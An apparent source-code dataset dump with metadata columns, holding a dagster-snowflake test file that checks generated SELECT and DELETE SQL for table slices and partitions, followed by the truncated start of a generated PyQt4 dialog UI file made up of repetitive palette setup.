| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9e8c7fea3e48b73ddba2f59ee4da0ef22f39117
| 2,211
|
py
|
Python
|
python_modules/libraries/dagster-snowflake/dagster_snowflake_tests/test_snowflake_io_manager.py
|
asamoal/dagster
|
08fad28e4b608608ce090ce2e8a52c2cf9dd1b64
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-snowflake/dagster_snowflake_tests/test_snowflake_io_manager.py
|
asamoal/dagster
|
08fad28e4b608608ce090ce2e8a52c2cf9dd1b64
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-snowflake/dagster_snowflake_tests/test_snowflake_io_manager.py
|
asamoal/dagster
|
08fad28e4b608608ce090ce2e8a52c2cf9dd1b64
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
from dagster_snowflake.db_io_manager import TablePartition, TableSlice
from dagster_snowflake.snowflake_io_manager import SnowflakeDbClient, _get_cleanup_statement
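# Tests for the SQL generated by the Snowflake DB IO manager: SELECT statements for
# whole tables, column subsets and time-window partitions, plus the corresponding
# DELETE (cleanup) statements.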
def test_get_select_statement():
assert (
SnowflakeDbClient.get_select_statement(
TableSlice(database="database_abc", schema="schema1", table="table1")
)
== "SELECT * FROM database_abc.schema1.table1"
)
def test_get_select_statement_columns():
assert (
SnowflakeDbClient.get_select_statement(
TableSlice(
database="database_abc",
schema="schema1",
table="table1",
columns=["apple", "banana"],
)
)
== "SELECT apple, banana FROM database_abc.schema1.table1"
)
def test_get_select_statement_partitioned():
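# A TablePartition with a time_window should be rendered as a BETWEEN clause on the
# configured partition expression.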
assert SnowflakeDbClient.get_select_statement(
TableSlice(
database="database_abc",
schema="schema1",
table="table1",
partition=TablePartition(
time_window=(datetime(2020, 1, 2), datetime(2020, 2, 3)),
partition_expr="my_timestamp_col",
),
columns=["apple", "banana"],
)
) == (
"SELECT apple, banana FROM database_abc.schema1.table1\n"
"WHERE my_timestamp_col BETWEEN '2020-01-02 00:00:00' AND '2020-02-03 00:00:00'"
)
def test_get_cleanup_statement():
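# The cleanup statement is a DELETE over the same table slice (presumably used to
# clear existing rows before an output is re-written).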
assert (
_get_cleanup_statement(
TableSlice(database="database_abc", schema="schema1", table="table1")
)
== "DELETE FROM database_abc.schema1.table1"
)
def test_get_cleanup_statement_partitioned():
assert _get_cleanup_statement(
TableSlice(
database="database_abc",
schema="schema1",
table="table1",
partition=TablePartition(
time_window=(datetime(2020, 1, 2), datetime(2020, 2, 3)),
partition_expr="my_timestamp_col",
),
)
) == (
"DELETE FROM database_abc.schema1.table1\n"
"WHERE my_timestamp_col BETWEEN '2020-01-02 00:00:00' AND '2020-02-03 00:00:00'"
)
| 30.708333
| 92
| 0.606965
| 227
| 2,211
| 5.643172
| 0.211454
| 0.08587
| 0.084309
| 0.136612
| 0.842311
| 0.790008
| 0.78064
| 0.78064
| 0.750976
| 0.750976
| 0
| 0.063492
| 0.287653
| 2,211
| 71
| 93
| 31.140845
| 0.749841
| 0
| 0
| 0.55
| 0
| 0.033333
| 0.255088
| 0.062867
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.083333
| true
| 0
| 0.05
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ddd10b0657552f9624c52513b4c218a93c966a30
| 63,496
|
py
|
Python
|
ui/packagexx_test.py
|
game-platform-awaresome/XSdkTools
|
2d5454f998014c130a28695dfcd9da155d20c9e9
|
[
"MIT"
] | 2
|
2020-09-24T10:47:27.000Z
|
2020-09-24T10:49:57.000Z
|
ui/packagexx_test.py
|
game-platform-awaresome/XSdkTools
|
2d5454f998014c130a28695dfcd9da155d20c9e9
|
[
"MIT"
] | null | null | null |
ui/packagexx_test.py
|
game-platform-awaresome/XSdkTools
|
2d5454f998014c130a28695dfcd9da155d20c9e9
|
[
"MIT"
] | 4
|
2019-03-25T04:22:30.000Z
|
2021-05-16T12:52:41.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'packagexx_test.ui'
#
# Created: Tue Nov 17 14:12:58 2015
# by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
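# Compatibility shims for PyQt4 builds where QString.fromUtf8 or
# QApplication.UnicodeUTF8 is unavailable.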
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Dialog(object):
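# Generated layout: an 857x612 dialog holding a QTabWidget with three tabs, an index
# page, a packaging page ("dabao") and a third-party plugin page.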
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(857, 612)
self.tabWidget = QtGui.QTabWidget(Dialog)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 851, 611))
self.tabWidget.setBaseSize(QtCore.QSize(0, 0))
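# Generated palette boilerplate: the same brush-assignment pattern repeats for a long
# list of color roles across the Active, Inactive and Disabled color groups.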
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.tabWidget.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setItalic(False)
font.setWeight(75)
font.setKerning(True)
self.tabWidget.setFont(font)
self.tabWidget.setIconSize(QtCore.QSize(16, 16))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.index = QtGui.QWidget()
self.index.setObjectName(_fromUtf8("index"))
self.frame_3 = QtGui.QFrame(self.index)
self.frame_3.setGeometry(QtCore.QRect(60, 80, 201, 181))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 213, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 149, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 213, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 149, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 213, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 149, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame_3.setPalette(palette)
self.frame_3.setAutoFillBackground(True)
self.frame_3.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtGui.QFrame.Raised)
self.frame_3.setObjectName(_fromUtf8("frame_3"))
self.label_3 = QtGui.QLabel(self.frame_3)
self.label_3.setGeometry(QtCore.QRect(10, 150, 81, 16))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
